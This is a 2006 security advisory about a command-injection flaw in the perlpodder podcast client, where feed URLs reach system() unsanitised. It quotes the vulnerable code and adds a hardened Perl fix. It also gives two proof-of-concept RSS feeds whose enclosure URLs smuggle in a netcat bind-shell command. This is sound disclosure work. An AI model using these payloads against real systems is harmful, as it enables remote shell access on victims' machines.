[UNIX] Perlpodder Arbitrary Command Execution

Subject: [UNIX] Perlpodder Arbitrary Command Execution
Date: 25 May 2006 18:59:31 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Perlpodder Arbitrary Command Execution
------------------------------------------------------------------------


SUMMARY

Perlpodder <http://sourceforge.net/projects/perlpodder/> is a podcatcher 
script written in Perl that automates downloading podcasts. Podcasting is 
the distribution of multimedia files over the internet. Normally, a server 
provides an RSS or Atom XML feed describing where to get the multimedia 
files. The client parses the feed and may then download the desired files.

A security flaw was identified in perlpodder which makes it possible for a 
malicious podcast server to execute arbitrary shell commands on the 
victim's client.

DETAILS

Vulnerable Systems:
 * perlpodder-0.4 and prior.

Immune Systems:
 * perlpodder-0.5

When perlpodder is used to fetch a podcast, it extracts the URL of the 
audio file from the XML feed the server provides. The URLs are saved in 
the variable "$dlset". There are two places in the code where this 
variable is passed to the system() function:

The first usage is with "echo" to log the URL (line 278):
[...]
277     # add urls to log file to mark as retrieved
278     $addurl = "echo " . $dlset . " >> $log_path ";
279     system $addurl;
[...]

The second usage is with "wget" to actually fetch the audio file (line 
294):
[...]
291     # Prepare to call wget
292
293     $wget_path = "$cwd". "$datadir" ;
294     $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2 --timeout=20 --random-wait " . $dlset . " -P " . $wget_path ;
295
296     if ($DEBUG > 0) {
297
298       print "running " . $wget_cmd . "\n" ;
299
300     }
301
302     system $wget_cmd;
[...]

Unfortunately, $dlset is never sanitized, so a remote server can include 
arbitrary shell commands in the URL, and both call sites hand the 
resulting string to system() (lines 279 and 302), where /bin/sh 
interprets it.
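A hardened form of the two call sites above, as an added example written for this page and not code from perlpodder or its 0.5 release: it rejects any enclosure URL outside a strict allow-list and replaces the shell command strings with plain Perl file I/O and the list form of system(), so $dlset is never interpreted by /bin/sh. The subroutine names, the allowed-character set and the sample URLs are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Accept only what an enclosure URL legitimately needs. Whitespace, ';',
# '&', '|', '`', '$', '>' and the other shell metacharacters are not in
# this set, so they are rejected before anything reaches a shell.
# (Assumed allow-list; tighten or loosen it for the feeds you fetch.)
sub safe_enclosure_url {
    my ($url) = @_;
    return unless defined $url;
    return unless $url =~ m{^https?://[A-Za-z0-9._~\-]+(?::\d+)?(?:/[A-Za-z0-9._~\-%/+=?]*)?$};
    return $url;
}

# Replacement for the "echo $dlset >> $log_path" call: write the URL with
# ordinary file I/O instead of building a shell command.
sub log_retrieved {
    my ($log_path, $dlset) = @_;
    my $url = safe_enclosure_url($dlset) or die "refusing unsafe URL\n";
    open my $fh, '>>', $log_path or die "cannot open $log_path: $!\n";
    print {$fh} "$url\n";
    close $fh;
}

# Replacement for the "wget ... $dlset -P $wget_path" call: the list form
# of system() passes argv straight to execvp(), so no shell ever sees it.
sub fetch_enclosure {
    my ($wget_path, $dlset) = @_;
    my $url = safe_enclosure_url($dlset) or die "refusing unsafe URL\n";
    my @wget_cmd = ('wget', '--quiet', '--background', '-o', '/dev/null',
                    '-c', '--tries=2', '--timeout=20', '--random-wait',
                    $url, '-P', $wget_path);
    return system(@wget_cmd);
}

# Constructed sample inputs: an ordinary enclosure URL and one carrying a
# shell metacharacter of the kind the advisory describes.
for my $candidate ('http://www.example.com/example.mp3',
                   'http://www.example.com/example.mp3; some command') {
    printf "%-52s %s\n", $candidate,
        defined safe_enclosure_url($candidate) ? 'accepted' : 'rejected';
}
```

Even with the allow-list in place, the list form of system() is the part that closes the bug; the validation is defence in depth for the log file and for wget's own option parsing.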

Proof of Concept:
A minimal malicious server rss feed which exploits the "echo" call may 
look as follows:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting Example Malicious Server Feed</title>
    <item>
        <enclosure url="http://www.example.com/example.mp3 >> /dev/null; 
nc -e /bin/sh -l -p 1337 &#" length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim's computer and 
bind a shell to it. This is just one example of how to exploit the 
vulnerability, as arbitrary commands can be included in the URL, but it 
should illustrate the point.

To exploit the "wget" call, the URL just has to be minimally adjusted:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting</title>
    <item>
        <enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh 
-l -p 1337 &#" length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>


Workaround:
Do not use perlpodder with untrusted servers.

Fix:
Upgrade to perlpodder-0.5 immediately:
 <http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download>

Disclosure Timeline:
 * 2006-05-19 - Discovery of the problem
 * 2006-05-19 - Notification of the author
 * 2006-05-21 - Fixed version of perlpodder is released
 * 2006-05-22 - Email from author pointing out the release
 * 2006-05-22 - Public release of the advisory without CVE number because 
of public release by the author. CVE will be appended when available.


ADDITIONAL INFORMATION

The original article can be found at:
 <http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt>


